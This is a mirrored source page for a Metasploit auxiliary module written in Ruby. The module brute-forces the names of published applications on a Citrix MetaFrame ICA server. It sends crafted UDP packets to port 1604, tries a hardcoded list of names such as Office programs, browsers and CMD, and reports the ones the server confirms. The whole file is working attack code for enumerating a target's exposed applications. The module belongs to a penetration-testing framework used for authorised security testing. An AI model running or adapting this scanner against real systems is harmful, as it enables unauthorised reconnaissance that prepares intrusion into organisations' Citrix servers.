CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/citrix_published_bruteforce.rb
Views: 11779
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Udp

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Citrix MetaFrame ICA Published Applications Bruteforcer',

12
      'Description'    => %q{

13
        This module attempts to brute force program names within the Citrix

14
        Metaframe ICA server.

15
      },

16
      'Author'         => [ 'aushack' ],

17
      'References'     =>

18
        [

19
          [ 'OSVDB', '50617' ],

20
          [ 'BID', '5817' ]

21
        ]

22
    ))

23


24
    register_options(

25
      [

26
        Opt::RPORT(1604),

27
      ])

28
  end

29


30
  def autofilter

31
    false

32
  end

33


34
  def run

35
    connect_udp

36


37
    print_status("Attempting to contact Citrix ICA service...")

38


39
    # Client NetBIOS hostname. This works fine >:)

40
    client = Rex::Text.rand_text_alphanumeric(8)

41


42
    # Server hello packet

43
    client_connect =

44
      "\x1e\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00" +

45
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

46


47
    # Server hello response

48
    server_response =

49
      "\x30\x00\x02\x31\x02\xfd\xa8\xe3\x02\x00\x06\x44"

50


51
    applications = [

52
      'TEST',

53
      'NOTEPAD',

54
      'ACROBAT READER',

55
      'ACROBAR',

56
      'EXPLORER',

57
      'WORD',

58
      'WORD2K',

59
      'WORDXP',

60
      'WORD2K3',

61
      'WORD2K7',

62
      'WORD 2000',

63
      'WORD XP',

64
      'WORD 2003',

65
      'WORD 2007',

66
      'WORD2000',

67
      'WORD2003',

68
      'WORD2007',

69
      'EXCEL',

70
      'EXCEL2K',

71
      'EXCELXP',

72
      'EXCEL2K3',

73
      'EXCEL2K7',

74
      'EXCEL 2000',

75
      'EXCEL XP',

76
      'EXCEL 2003',

77
      'EXCEL 2007',

78
      'EXCEL2000',

79
      'EXCEL2003',

80
      'EXCEL2007',

81
      'ACCESS',

82
      'ACCESS2K',

83
      'ACCESSXP',

84
      'ACCESS2K3',

85
      'ACCESS2K7',

86
      'ACCESS 2000',

87
      'ACCESS XP',

88
      'ACCESS 2003',

89
      'ACCESS 2007',

90
      'ACCESS2000',

91
      'ACCESS2003',

92
      'ACCESS2007',

93
      'POWERPOINT',

94
      'POWERPOINT2K',

95
      'POWERPOINTXP',

96
      'POWERPOINT2K3',

97
      'POWERPOINT2K7',

98
      'POWERPOINT 2000',

99
      'POWERPOINT XP',

100
      'POWERPOINT 2003',

101
      'POWERPOINT 2007',

102
      'POWERPOINT2000',

103
      'POWERPOINT2003',

104
      'POWERPOINT2007',

105
      'OUTLOOK',

106
      'OUTLOOKXP',

107
      'OUTLOOK2K',

108
      'OUTLOOK2K3',

109
      'OUTLOOK2K7',

110
      'OUTLOOK 2000',

111
      'OUTLOOK XP',

112
      'OUTLOOK 2003',

113
      'OUTLOOK 2007',

114
      'OUTLOOK2000',

115
      'OUTLOOK2003',

116
      'OUTLOOK2007',

117
      'LOTUS',

118
      'LOTUS NOTES',

119
      'INTERNETEXPLORER',

120
      'IE',

121
      'IEXPLORER',

122
      'FIREFOX',

123
      'FIREFOX 3',

124
      'NETSCAPE',

125
      'NETSCAPE7',

126
      'NETSCAPE6',

127
      'MAIL',

128
      'EMAIL',

129
      'E-MAIL',

130
      'INTERNET',

131
      'CMD',

132
      'COMMAND',

133
    ]

134


135
    # Citrix is publishing this application

136
    application_valid =

137
      "\x3e\x00\x02\x35\x02\xfd\xa8\xe3\x02\x00\x06\x44"

138
    # Application not found / published

139
    application_invalid =

140
      "\x20\x00\x01\x3a\x02\xfd\xa8\xe3\x02\x00\x06\x44"

141


142
    udp_sock.put(client_connect)

143
    res = udp_sock.get(3)

144


145
    if (res[0,server_response.length] == server_response)

146
      print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")

147


148
      applications.each do |application|

149


150
        # Create the packet

151
        packet = [52 + application.length].pack('C')

152
        packet << "\x00\x02\x34\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00"

153
        packet << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\x00\x02\x00"

154
        packet << [39 + application.length].pack('C')

155
        packet << "\x00\x00\x00\x00\x00"

156
        packet << application

157
        packet << "\x00\x01\x00\x04\x00"

158
        packet << client

159
        packet << "\x00"

160


161
        udp_sock.put(packet)

162
        res = udp_sock.get(3)

163


164
        if (res[0,application_valid.length] == application_valid)

165
          print_status("Found: #{application}")

166
        end

167


168
        if (res[0,application_invalid.length] == application_invalid)

169
          print_error("NOT Found: #{application}")

170
        end

171
      end

172


173
    else

174
      print_error("Server did not respond.")

175
    end

176


177
    disconnect_udp

178
  end

179
end

180


181